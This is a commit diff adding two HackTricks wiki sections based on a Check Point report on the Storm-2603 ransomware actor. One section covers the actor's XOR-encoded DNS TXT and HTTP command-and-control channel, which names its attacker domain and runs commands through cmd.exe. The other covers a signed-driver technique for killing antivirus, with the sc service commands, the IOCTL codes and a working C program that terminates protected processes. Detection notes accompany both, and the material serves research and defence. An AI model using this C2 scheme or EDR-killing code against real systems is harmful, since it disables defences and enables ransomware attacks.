Merge pull request #1223 from HackTricks-wiki/update_Before_ToolShell__Exploring_Storm-2603_s_Previous__20250801_014810

carlospolop · web-flow · commit 42408a846891 · 2025-08-04T12:02:50.000+02:00
Before ToolShell Exploring Storm-2603’s Previous Ransomware ...
diff --git a/src/generic-hacking/tunneling-and-port-forwarding.md b/src/generic-hacking/tunneling-and-port-forwarding.md
@@ -542,6 +542,40 @@ Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request thr
 
 [https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel)
 
+### Custom DNS TXT / HTTP JSON C2 (AK47C2)
+
+The Storm-2603 actor created a **dual-channel C2 ("AK47C2")** that abuses *only* outbound **DNS** and **plain HTTP POST** traffic – two protocols that are rarely blocked on corporate networks.
+
+1. **DNS mode (AK47DNS)**
+   • Generates a random 5-character SessionID (e.g. `H4T14`).  
+   • Prepends `1` for *task requests* or `2` for *results* and concatenates different fields (flags, SessionID, computer name).  
+   • Each field is **XOR-encrypted with the ASCII key `VHBD@H`**, hex-encoded, and glued together with dots – finally ending with the attacker-controlled domain:
+
+   ```text
+   <1|2><SessionID>.a<SessionID>.<Computer>.update.updatemicfosoft.com
+   ```
+
+   • Requests use `DnsQuery()` for **TXT** (and fallback **MG**) records.  
+   • When the response exceeds 0xFF bytes the backdoor **fragments** the data into 63-byte pieces and inserts the markers:
+     `s<SessionID>t<TOTAL>p<POS>` so the C2 server can reorder them.
+
+2. **HTTP mode (AK47HTTP)**
+   • Builds a JSON envelope:
+   ```json
+   {"cmd":"","cmd_id":"","fqdn":"<host>","result":"","type":"task"}
+   ```
+   • The whole blob is XOR-`VHBD@H` → hex → sent as the body of a **`POST /`** with header `Content-Type: text/plain`.
+   • The reply follows the same encoding and the `cmd` field is executed with `cmd.exe /c <command> 2>&1`.
+
+Blue Team notes
+• Look for unusual **TXT queries** whose first label is long hexadecimal and always end in one rare domain.  
+• A constant XOR key followed by ASCII-hex is easy to detect with YARA: `6?56484244?484` (`VHBD@H` in hex).  
+• For HTTP, flag text/plain POST bodies that are pure hex and multiple of two bytes.
+
+{{#note}}
+The entire channel fits inside **standard RFC-compliant queries** and keeps each sub-domain label under 63 bytes, making it stealthy in most DNS logs.
+{{#endnote}}
+
 ## ICMP Tunneling
 
 ### Hans
@@ -792,6 +826,7 @@ Because Tiny Core is stateless, attackers usually:
 ## References
 
 - [Hiding in the Shadows: Covert Tunnels via QEMU Virtualization](https://trustedsec.com/blog/hiding-in-the-shadows-covert-tunnels-via-qemu-virtualization)
+- [Check Point Research – Before ToolShell: Exploring Storm-2603’s Previous Ransomware Operations](https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/)
 
 {{#include ../banners/hacktricks-training.md}}
 
diff --git a/src/windows-hardening/av-bypass.md b/src/windows-hardening/av-bypass.md
@@ -639,4 +639,45 @@ https://github.com/praetorian-code/vulcan
 
 - [https://github.com/Seabreg/Xeexe-TopAntivirusEvasion](https://github.com/Seabreg/Xeexe-TopAntivirusEvasion)
 
+## Bring Your Own Vulnerable Driver (BYOVD) – Killing AV/EDR From Kernel Space
+
+Storm-2603 leveraged a tiny console utility known as **Antivirus Terminator** to disable endpoint protections before dropping ransomware. The tool brings its **own vulnerable but *signed* driver** and abuses it to issue privileged kernel operations that even Protected-Process-Light (PPL) AV services cannot block.
+
+Key take-aways
+1. **Signed driver**: The file delivered to disk is `ServiceMouse.sys`, but the binary is the legitimately signed driver `AToolsKrnl64.sys` from Antiy Labs’ “System In-Depth Analysis Toolkit”. Because the driver bears a valid Microsoft signature it loads even when Driver-Signature-Enforcement (DSE) is enabled.
+2. **Service installation**:
+   ```powershell
+   sc create ServiceMouse type= kernel binPath= "C:\Windows\System32\drivers\ServiceMouse.sys"
+   sc start  ServiceMouse
+   ```
+   The first line registers the driver as a **kernel service** and the second one starts it so that `\\.\ServiceMouse` becomes accessible from user land.
+3. **IOCTLs exposed by the driver**
+   | IOCTL code | Capability                              |
+   |-----------:|-----------------------------------------|
+   | `0x99000050` | Terminate an arbitrary process by PID (used to kill Defender/EDR services) |
+   | `0x990000D0` | Delete an arbitrary file on disk |
+   | `0x990001D0` | Unload the driver and remove the service |
+
+   Minimal C proof-of-concept:
+   ```c
+   #include <windows.h>
+   
+   int main(int argc, char **argv){
+       DWORD pid = strtoul(argv[1], NULL, 10);
+       HANDLE hDrv = CreateFileA("\\\\.\\ServiceMouse", GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+       DeviceIoControl(hDrv, 0x99000050, &pid, sizeof(pid), NULL, 0, NULL, NULL);
+       CloseHandle(hDrv);
+       return 0;
+   }
+   ```
+4. **Why it works**:  BYOVD skips user-mode protections entirely; code that executes in the kernel can open *protected* processes, terminate them, or tamper with kernel objects irrespective of PPL/PP, ELAM or other hardening features.
+
+Detection / Mitigation
+•  Enable Microsoft’s vulnerable-driver block list (`HVCI`, `Smart App Control`) so Windows refuses to load `AToolsKrnl64.sys`.
+•  Monitor creations of new *kernel* services and alert when a driver is loaded from a world-writable directory or not present on the allow-list.
+•  Watch for user-mode handles to custom device objects followed by suspicious `DeviceIoControl` calls.
+
+## References
+
+- [Check Point Research – Before ToolShell: Exploring Storm-2603’s Previous Ransomware Operations](https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/)
 {{#include ../banners/hacktricks-training.md}}
